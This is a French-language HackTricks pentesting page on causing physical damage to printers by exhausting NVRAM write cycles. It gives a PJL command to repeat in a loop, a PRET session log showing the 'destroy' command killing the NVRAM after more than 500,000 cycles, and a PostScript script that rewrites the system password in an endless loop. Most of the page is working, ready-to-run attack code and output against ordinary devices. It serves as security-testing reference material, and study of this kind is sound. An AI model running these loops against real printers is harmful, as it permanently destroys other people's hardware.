hacktricks/network-services-pentesting/pentesting-printers/physical-damage.md

4.6 KiB

Apprenez le hacking AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres moyens de soutenir HackTricks :

Les paramètres à long terme pour les imprimantes et autres dispositifs embarqués sont stockés dans une mémoire non volatile (NVRAM), qui est traditionnellement mise en œuvre soit comme EEPROM ou comme mémoire flash. Ces composants ont une durée de vie limitée. Aujourd'hui, les fournisseurs de mémoire flash garantissent environ 100 000 réécritures avant que des erreurs d'écriture puissent survenir.

PJL

Pour un test pratique visant à détruire la fonctionnalité d'écriture NVRAM, on peut continuellement définir la valeur à long terme pour le nombre de copies avec différentes valeurs pour X :

@PJL DEFAULT COPIES=X

Habituellement, avant d'arrêter d'autoriser l'écriture, les paramètres NVRAM sont fixés à la valeur par défaut de l'usine et toutes les variables pourraient encore être modifiées pour le travail d'impression actuel en utilisant la commande @PJL SET....

En utilisant PRET :

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> destroy
Warning: This command tries to cause physical damage to the
printer NVRAM. Use at your own risk. Press CTRL+C to abort.
Starting NVRAM write cycle loop in... 10 9 8 7 6 5 4 3 2 1 KABOOM!
Dave, stop. Stop, will you? Stop, Dave. Will you stop, Dave?
[... wait for about 24 hours ...]
I'm afraid. I'm afraid, Dave. Dave, my mind is going...
NVRAM died after 543894 cycles, 18:46:11

PostScript

Pour PostScript, il faut trouver une entrée dans le dictionnaire currentsystemparams qui survit à un redémarrage (et doit donc être stockée dans une sorte de NVRAM). Un bon candidat serait un mot de passe PostScript.
PostScript peut exécuter un script qui corrompt sa propre NVRAM :

/counter 0 def
{ << /Password counter 16 string cvs
/SystemParamsPassword counter 1 add 16 string cvs
>> setsystemparams /counter counter 1 add def
} loop

Plus d'informations sur ces techniques sont disponibles sur http://hacking-printers.net/wiki/index.php/Physical_damage

Apprenez le hacking AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres moyens de soutenir HackTricks :